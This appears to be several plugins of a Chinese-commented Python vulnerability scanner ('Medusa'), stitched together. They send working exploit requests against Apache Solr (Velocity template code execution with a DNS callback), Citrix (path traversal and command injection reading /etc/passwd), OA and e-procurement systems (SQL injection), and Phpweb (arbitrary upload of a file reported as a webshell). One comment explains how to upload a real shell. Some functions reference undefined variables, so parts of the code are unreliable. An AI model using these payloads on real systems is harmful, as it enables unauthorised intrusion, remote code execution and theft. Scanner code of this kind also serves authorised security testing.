def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
payload_url = scheme + "://" + url + ":" + str(
port) + '/solr/admin/cores'
step1 = requests.get(payload_url,
timeout=6,
proxies=proxies,
headers=headers).text
data = json.loads(step1)
if 'status' in data:
name = ''
for x in data['status']:
name = x
payload = "/solr/" + name + "/config"
DL = ClassCongregation.Dnslog()
payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping {}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format(
DL.dns_host())
payload_url1 = scheme + "://" + url + ":" + str(port) + payload
payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
payload_data = """{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}"""
headers1 = {
'User-Agent': RandomAgent,
'Content-Type': 'application/json',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':
'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
}
resp = requests.post(payload_url1,
data=payload_data,
headers=headers1,
proxies=proxies,
timeout=6,
verify=False)
resp2 = requests.get(payload_url2,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con2 = resp2.text
if DL.result():
Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\nDNSlog:{}\r\n".format(
url, con2, DL.dns_host())
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, Token, proxies=None):
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
payload = "/vpn/../vpns/portal/scripts/newbm.pl"
payload_url = scheme + "://" + url + ":" + str(port) + payload
randoms = rand()
try:
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': RandomAgent,
"Connection": "close",
"NSC_USER":
"******".format(randoms),
"NSC_NONCE": "nsroot"
}
data = "url=http://example.com&title={}&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]".format(
randoms)
resp = requests.post(payload_url,
data=data,
headers=headers,
proxies=proxies,
timeout=5,
verify=False,
allow_redirects=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("parent.window.ns_reload") != -1:
payload_url2 = scheme + "://" + url + ":" + str(
port) + '/vpn/../vpns/portal/{}.xml'.format(randoms)
headers2 = {
"NSC_USER": "******",
"NSC_NONCE": "nsroot",
"Upgrade-Insecure-Requests": "1",
"Cache-Control": "max-age=0",
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': RandomAgent,
}
resp2 = requests.get(payload_url2,
headers=headers2,
proxies=proxies,
timeout=5,
verify=False)
con2 = resp2.text
code2 = resp2.status_code
if code2 == 200 and con2.find("root:") != -1 and con2.find(
"bin:") != -1 and con2.find("/root") != -1:
Medusa = "{} 存在Citrix远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n使用POST数据包:\r\n{}\r\n返回数据包:\r\n{}\r\n".format(
url, payload_url2, data, con2)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, Token).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
# if __name__ == '__main__':
#
# with open(r'../123.txt', 'r') as file:
# content_lists = file.readlines()
# url = [x.strip() for x in content_lists]
# for l in url:
# medusa(l)
#medusa("http://","Mozilla/5.0(compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)")
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
for turl in urls:
try:
payload_url = scheme + "://" + url + turl + payload
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'User-Agent': RandomAgent,
}
resp = requests.get(payload_url,
headers=headers,
proxies=proxies,
timeout=5,
verify=False)
con = resp.text
code = resp.status_code
if code == 500 and con.lower().find('gqxmicrosoft') != -1:
Medusa = "{}存在璐华OA系统SQL注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(
url, payload_url)
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
except:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
try:
payload_url = scheme + "://" + url + ':' + str(
port) + "/include/get_user.aspx"
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'User-Agent': RandomAgent,
}
resp = requests.get(payload_url,
headers=headers,
proxies=proxies,
timeout=5,
verify=False)
con = resp.text
if con.lower().find('button_normal') != -1:
Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url)
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
RD = ClassCongregation.randoms().result(20)
payload = "/library/editornew/Editor/img_save.asp"
payload_url = scheme + "://" + url + ":" + str(port) + payload
data = '''
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_src"; filename="123.cer"
Content-Type: application/x-x509-ca-cert
{}
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="Submit"
提交
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_alt"
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_align"
baseline
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_border"
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="newid"
45
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_hspace"
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_vspace"
------WebKitFormBoundaryNjZKAB66SVyL1INA--
'''.format(RD)
Headers['Content-Type'] = 'application/x-www-form-urlencoded'
Headers[
'Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
resp = requests.post(payload_url,
data=data,
headers=Headers,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
match = re.search(r'getimg\(\'([\d]+.cer)\'\)', con)
if match:
payload_url2 = scheme + "://" + url + ":" + str(
port) + "/library/editornew/Editor/NewImage/" + match.group(1)
resp2 = requests.get(payload_url2,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
con2 = resp2.text
code2 = resp2.status_code
#如果要上传shell直接把testvul这个值改为一句话就可以
if code2 == 200 and con2.lower().find(RD) != -1:
Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format(
url, payload_url2, con2)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
urls = [
'/Plan/TitleShow/ApplyInfo.aspx?ApplyID=1',
'/Price/AVL/AVLPriceTrends_SQU.aspx?classId=1',
'/Price/SuggestList.aspx?priceid=1',
'/PriceDetail/PriceComposition_Formula.aspx?indexNum=3&elementId=1',
'/Products/Category/CategoryOption.aspx?option=IsStop&classId=1',
'/Products/Tiens/CategoryStockView.aspx?id=1',
'/custom/CompanyCGList.aspx?ComId=1',
'/SuperMarket/InterestInfoDetail.aspx?ItemId=1',
'/Orders/k3orderdetail.aspx?FINTERID=1',
'/custom/GroupNewsList.aspx?child=true&groupId=121'
]
payload1 = "%20AND%206371=DBMS_PIPE.RECEIVE_MESSAGE(11,0)"
payload2 = "%20AND%206371=DBMS_PIPE.RECEIVE_MESSAGE(11,5)"
for payload in urls:
try:
payload_url = scheme + "://" + url + ":" + str(
port) + payload + payload1
payload_url2 = scheme + "://" + url + ":" + str(
port) + payload + payload2
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
time0 = time.time()
resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
time1 = time.time()
resp2 = s.get(payload_url2,
headers=headers,
timeout=6,
verify=False)
time2 = time.time()
con = resp.text
code = resp.status_code
code2 = resp2.status_code
if code2 != 0 and code != 0 and ((time1 - time0) -
(time2 - time1)) > 4:
Medusa = "{}存在一采通电子采购系统SQL注入漏洞\r\n 验证数据:\r\n返回内容:{}\r\npayload:{}\r\n".format(
url, con, payload_url)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload1 = "/base/post.php"
payload_url1 = scheme + '://' + url + ':' + str(port) + payload1
dada = "act=appcode"
payload2 = "/base/appfile.php"
payload_url2 = scheme + '://' + url + ':' + str(port) + payload2
ran = ranstr(10)
payload_url3 = scheme + '://' + url + ':' + str(port) + "/effect/source/bg/{}.txt".format(ran)
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
}
headers2 = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': RandomAgent,
'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary0ZoOKoVwkSlGFfVE',
}
resp = requests.post(payload_url1, data=dada,proxies=proxies, headers=headers, timeout=5, verify=False)
con = resp.text
k = re.match('k=(.*?)&', con, re.M | re.I).group(1) # 提取K的值
md5_en = hashlib.md5((k + "1").encode("utf-8")).hexdigest()
dada2 = '''------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="file"; filename="{}.txt"
Content-Type: application/octet-stream
{}
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="t"
1
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="m"
{}
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="act"
upload
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="r_size"
10
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="submit"
getshell
------WebKitFormBoundary0ZoOKoVwkSlGFfVE--'''.format(ran, ran, md5_en)
resp2 = requests.post(payload_url2, data=dada2,proxies=proxies, headers=headers2, timeout=5, verify=False)
resp3 = requests.get(payload_url3, headers=headers, proxies=proxies,timeout=5, verify=False)
code3 = resp3.status_code
con3 = resp3.text
if code3 == 200 and con3.find(ran) != -1:
Medusa = "{} 存在Phpweb前台任意文件上传漏洞\r\n漏洞地址:\r\n上传位置:\r\n{}\r\n上传数据包:\r\n{}\r\nwebshell位置:\r\n{}\r\n漏洞详情:\r\n{}".format(url,payload_url2,dada2,payload_url3,con3)
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs) -> None:
url = kwargs.get("Url") #获取传入的url参数
Headers = kwargs.get("Headers") #获取传入的头文件
proxies = kwargs.get("Proxies") #获取传入的代理参数
try:
Headers1 = Headers
Headers1['Content-Type'] = 'application/x-www-form-urlencoded'
payload_url = url + '/solr/admin/cores'
step1 = requests.get(payload_url,
timeout=6,
proxies=proxies,
headers=Headers1).text
data = json.loads(step1)
if 'status' in data:
name = ''
for x in data['status']:
name = x
payload = "/solr/" + name + "/config"
DL = ClassCongregation.Dnslog()
payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping {}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format(
DL.dns_host())
payload_url1 = url + payload
payload_url2 = url + payload2
payload_data = """{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}"""
Headers2 = Headers
Headers2['Content-Type'] = 'application/json'
resp = requests.post(payload_url1,
data=payload_data,
headers=Headers2,
proxies=proxies,
timeout=6,
verify=False)
resp2 = requests.get(payload_url2,
headers=Headers1,
timeout=6,
proxies=proxies,
verify=False)
con2 = resp2.text
if DL.result():
Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\nDNSlog:{}\r\n".format(
url, con2, DL.dns_host())
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, resp2, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
